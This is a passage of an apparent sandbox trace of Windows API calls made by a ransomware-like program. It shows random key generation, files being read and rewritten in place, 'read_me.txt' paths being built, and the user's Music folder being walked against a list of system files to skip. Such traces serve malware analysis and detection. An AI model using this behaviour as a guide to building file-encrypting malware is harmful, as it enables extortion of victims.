hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.237] CloseHandle (hObject=0x838) returned 1 [0078.237] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 44 [0078.237] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.237] ReadFile (in: hFile=0x828, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.237] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0078.237] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0078.237] ReadFile (in: hFile=0x828, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x494, lpOverlapped=0x0) returned 1 [0078.362] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0xfffffb6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.362] WriteFile (in: hFile=0x828, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x494, lpOverlapped=0x0) returned 1 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3d8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.362] GetProcessHeap () returned 0x280000 [0078.362] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.362] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.363] GetProcessHeap () returned 0x280000 [0078.363] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.363] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d533e8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d533e8 | out: hHeap=0x280000) returned 1 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.364] GetProcessHeap () returned 0x280000 [0078.364] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.365] GetProcessHeap () returned 0x280000 [0078.365] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3d8 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.366] GetProcessHeap () returned 0x280000 [0078.366] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.366] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.366] WriteFile (in: hFile=0x828, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.367] WriteFile (in: hFile=0x828, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.367] GetProcessHeap () returned 0x280000 [0078.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0078.367] GetProcessHeap () returned 0x280000 [0078.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.367] GetProcessHeap () returned 0x280000 [0078.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.367] CloseHandle (hObject=0x828) returned 1 [0078.368] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 45 [0079.079] GetProcessHeap () returned 0x280000 [0079.079] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0079.079] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0079.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x28038c, ftCreationTime.dwLowDateTime=0x7dd2c28, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x45, ftLastAccessTime.dwHighDateTime=0x80, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x77162c67, nFileSizeHigh=0x8bf0058, nFileSizeLow=0x7715e36c, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Pࢿ", cAlternateFileName="")) returned 0xffffffff [0079.080] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt") returned 60 [0079.080] GetProcessHeap () returned 0x280000 [0079.080] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0079.080] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 64 [0079.080] GetProcessHeap () returned 0x280000 [0079.080] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ac00c0 | out: hHeap=0x280000) returned 1 [0079.087] GetProcessHeap () returned 0x280000 [0079.087] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0079.087] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0079.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0079.087] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.") returned 41 [0079.087] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0079.087] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\..") returned 42 [0079.087] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4cfe90, ftCreationTime.dwHighDateTime=0x1d4d031, ftLastAccessTime.dwLowDateTime=0x3bdfead0, ftLastAccessTime.dwHighDateTime=0x1d4cfce, ftLastWriteTime.dwLowDateTime=0x3bdfead0, ftLastWriteTime.dwHighDateTime=0x1d4cfce, nFileSizeHigh=0x0, nFileSizeLow=0x140f2, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="-PhpxZ2.wav", cAlternateFileName="")) returned 1 [0079.087] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-PhpxZ2.wav") returned 51 [0079.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-PhpxZ2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-phpxz2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84c [0079.087] StrStrW (lpFirst="-phpxz2.wav", lpSrch="read_me.txt") returned 0x0 [0079.087] StrStrW (lpFirst="-phpxz2.wav", lpSrch="autoexec.bat") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="desktop.ini") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="autorun.inf") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="ntuser.dat") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="iconcache.db") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="bootsect.bak") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="boot.ini") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.088] StrStrW (lpFirst="-phpxz2.wav", lpSrch="thumbs.db") returned 0x0 [0079.088] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 117 [0079.088] QueueUserWorkItem (Function=0x404e00, Context=0x84c, Flags=0x0) returned 1 [0079.088] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x628677b0, ftCreationTime.dwHighDateTime=0x1d4ccba, ftLastAccessTime.dwLowDateTime=0xc55ef5d0, ftLastAccessTime.dwHighDateTime=0x1d4d046, ftLastWriteTime.dwLowDateTime=0xc55ef5d0, ftLastWriteTime.dwHighDateTime=0x1d4d046, nFileSizeHigh=0x0, nFileSizeLow=0xd590, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="0l 0RHfCGFEjO.m4a", cAlternateFileName="0L0RHF~1.M4A")) returned 1 [0079.088] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0l 0RHfCGFEjO.m4a") returned 57 [0079.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0l 0RHfCGFEjO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0l 0rhfcgfejo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x848 [0079.088] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="read_me.txt") returned 0x0 [0079.088] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.088] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="desktop.ini") returned 0x0 [0079.088] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="autorun.inf") returned 0x0 [0079.088] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.089] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="iconcache.db") returned 0x0 [0079.089] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.089] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="boot.ini") returned 0x0 [0079.089] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.089] StrStrW (lpFirst="0l 0rhfcgfejo.m4a", lpSrch="thumbs.db") returned 0x0 [0079.089] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 118 [0079.089] QueueUserWorkItem (Function=0x404e00, Context=0x848, Flags=0x0) returned 1 [0079.089] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380a9c40, ftCreationTime.dwHighDateTime=0x1d4cdd3, ftLastAccessTime.dwLowDateTime=0x25330420, ftLastAccessTime.dwHighDateTime=0x1d4c87b, ftLastWriteTime.dwLowDateTime=0x25330420, ftLastWriteTime.dwHighDateTime=0x1d4c87b, nFileSizeHigh=0x0, nFileSizeLow=0x1546e, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="1RsCk5_jhZ7iPa9TCQ0M.mp3", cAlternateFileName="1RSCK5~1.MP3")) returned 1 [0079.089] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RsCk5_jhZ7iPa9TCQ0M.mp3") returned 64 [0079.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RsCk5_jhZ7iPa9TCQ0M.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1rsck5_jhz7ipa9tcq0m.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x844 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="read_me.txt") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="desktop.ini") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="autorun.inf") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="iconcache.db") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="boot.ini") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.089] StrStrW (lpFirst="1rsck5_jhz7ipa9tcq0m.mp3", lpSrch="thumbs.db") returned 0x0 [0079.089] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 119 [0079.089] QueueUserWorkItem (Function=0x404e00, Context=0x844, Flags=0x0) returned 1 [0079.090] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98108730, ftCreationTime.dwHighDateTime=0x1d4cb71, ftLastAccessTime.dwLowDateTime=0x5d425660, ftLastAccessTime.dwHighDateTime=0x1d4ce6e, ftLastWriteTime.dwLowDateTime=0x5d425660, ftLastWriteTime.dwHighDateTime=0x1d4ce6e, nFileSizeHigh=0x0, nFileSizeLow=0x5c7f, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="2 8QDmBQXX.m4a", cAlternateFileName="28QDMB~1.M4A")) returned 1 [0079.090] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2 8QDmBQXX.m4a") returned 54 [0079.090] CreateFileW 